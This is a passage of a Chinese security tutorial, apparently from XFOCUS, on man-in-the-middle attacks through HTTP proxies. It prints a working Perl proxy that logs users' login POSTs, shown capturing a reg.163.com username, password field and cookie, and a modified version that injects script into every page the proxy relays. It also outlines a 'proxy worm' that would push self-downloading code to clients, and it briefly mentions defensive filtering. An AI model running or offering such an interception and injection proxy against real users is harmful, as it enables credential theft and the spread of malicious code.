📄 man-in-the-middle-attacks in proxy.html
字号:
}<br />
}<br />
}<br />
$browser-> close;<br />
$host -> close;<br />
} <br />
<br />
=============================codz end===============================<br />
运行此脚本把结果保存到test.log:<br />
C:\usr\bin>perl proxytest1.pl >>test.log <br />
<br />
然后Clinet使用次代理访问<a href='http://reg.163.com/CheckUser.jsp ' target='_blank'>http://reg.163.com/CheckUser.jsp </a>登陆<br />
<br />
打开test.log得到如下数据:<br />
<br />
--------------Clint提交数据-------------------<br />
Opened reg.163.com , port 80<br />
POST /CheckUser.jsp HTTP/1.0<br />
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*<br />
Referer: <a href='http://reg.163.com/CheckUser.jsp' target='_blank'>http://reg.163.com/CheckUser.jsp</a><br />
…….省略…….<br />
Cookie: URSJESSIONID=b370cQyLDya7<br />
…….省略…….<br />
url=&username=hack-520&password=*****&submit=%B5%C7%A1%A1%C2%BC<br />
<br />
................Serve返回数据.................xx<br />
HTTP/1.1 200 OK<br />
<br />
<br />
如下图所示:<br />
<br />
成功得到<br />
username=hack-520<br />
password=*****<br />
<br />
2.代码注射<br />
在使用代理的整个过程里,最终是通过代理服务器把数据发给clinet,这个数据是我们可以控制的,我们可以注射我们的恶意代码提交给clinet,修改上面的perl程如下:<br />
<br />
=============================codz start===============================<br />
#!/usr/bin/perl <br />
#proxy mid-man-atk Test script<br />
<br />
use strict;<br />
use URI;<br />
use IO::Socket;<br />
<br />
my $showOpenedSockets=1;<br />
<br />
my $server = IO::Socket::INET->new (<br />
LocalPort => 8080,<br />
Type => SOCK_STREAM,<br />
Reuse => 1,<br />
Listen => 10);<br />
<br />
<br />
binmode $server;<br />
<br />
while (my $browser = $server->accept()) {<br />
print "\n\n--------------------------------------------\n";<br />
<br />
binmode $browser;<br />
<br />
my $method ="";<br />
my $content_length = 0;<br />
my $content = 0;<br />
my $accu_content_length = 0;<br />
my $host;<br />
my $hostAddr;<br />
my $httpVer;<br />
<br />
while (my $browser_line = <$browser>) {<br />
unless ($method) {<br />
($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+) +(\S+) +(\S+)/;<br />
<br />
my $uri = URI->new($hostAddr);<br />
<br />
$host = IO::Socket::INET->new (<br />
PeerAddr=> $uri->host,<br />
PeerPort=> $uri->port );<br />
<br />
die "couldn't open $hostAddr" unless $host;<br />
<br />
if ($showOpenedSockets) {<br />
print "Opened ".$uri->host." , port ".$uri->port."\n";<br />
}<br />
<br />
binmode $host;<br />
<br />
print $host "$method ".$uri->path_query." $httpVer\n";<br />
print "$method ".$uri->path_query." $httpVer\n";<br />
next;<br />
}<br />
<br />
$content_length = $1 if $browser_line=~/Content-length: +(\d+)/i;<br />
$accu_content_length+=length $browser_line;<br />
print $browser_line;<br />
print $host $browser_line;<br />
last if $browser_line =~ /^\s*$/ and $method ne 'POST';<br />
if ($browser_line =~ /^\s*$/ and $method eq "POST") {<br />
$content = 1;<br />
last unless $content_length;<br />
next;<br />
}<br />
if ($content) {<br />
$accu_content_length+=length $browser_line;<br />
last if $accu_content_length >= $content_length;<br />
}<br />
}<br />
print "\n\nxx....................................xx\n";<br />
<br />
$content_length = 0;<br />
$content = 0;<br />
$accu_content_length = 0;<br />
<br />
my @ret= <$host>;<br />
my $ret=@ret;<br />
push(@ret,"<script>alert(\"superhei\")</script>"); #〈=注意这里<br />
<br />
foreach my $host_line (@ret){<br />
print $host_line;<br />
print $browser $host_line;<br />
$content_length = $1 if $host_line=~/Content-length: +(\d+)/i;<br />
if ($host_line =~ m/^\s*$/ and not $content) {<br />
$content = 1;<br />
#last unless $content_length;<br />
next;<br />
}<br />
if ($content) {<br />
if ($content_length) {<br />
$accu_content_length+=length $host_line;<br />
print "\nContent Length: $content_length, accu: $accu_content_length\n";<br />
last if $accu_content_length >= $content_length;<br />
}<br />
}<br />
}<br />
$browser-> close;<br />
$host -> close;<br />
}<br />
=============================codz end===============================<br />
代码:<br />
<br />
my @ret= <$host>;<br />
my $ret=@ret;<br />
push(@ret,"<script>alert(\"superhei\")</script>"); #〈=注意这里<br />
<br />
这个在代理服务最终把webserver返回的数据<$host>里 注射了代码<script>alert("superhei")</script>。<br />
<br />
运行上面的程序,当clinet用此代理服务器访问任意站时都回执行<script>alert("superhei")</script><br />
如图2:<br />
<br />
3.Proxy worm的实现<br />
<br />
如果上面的例子在配合其他的客户端攻击(如网页木马),那么就可以实现proxy worm了:<br />
<br />
<br />
proxyworm--àclinet(proxyworm1)-àclinet1(proxyworm2)-à…..à<br />
<br />
clinet1在使用了proxyworm代理后,proxyworm向clinet注射可以让clinet下载并运行自身的代码,clinet被攻击后成为了proxyworm1 ……..。<br />
<br />
4.其他应用<br />
技术都又它的双面性,我们和可以利用在安全方面:比如恶意代码过虑平台:webserve 返回的数据经过代理服务器时 经过过滤在 发送给 clinet <br />
………<br />
<br />
小结:<br />
其实Man-in-the-middle-attacks是个很大的课题,在很多方面都提到,<br />
本文只是浅显的通过http协议代理介绍了下“代理中间人攻击技术”, 如果有兴趣的朋友可以研究下 其他协议“代理中间人攻击技术”。
</td>
</tr>
</table><div class="footer"> Copyright © 1998-2005 XFOCUS Team. All Rights Reserved</div></body></html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -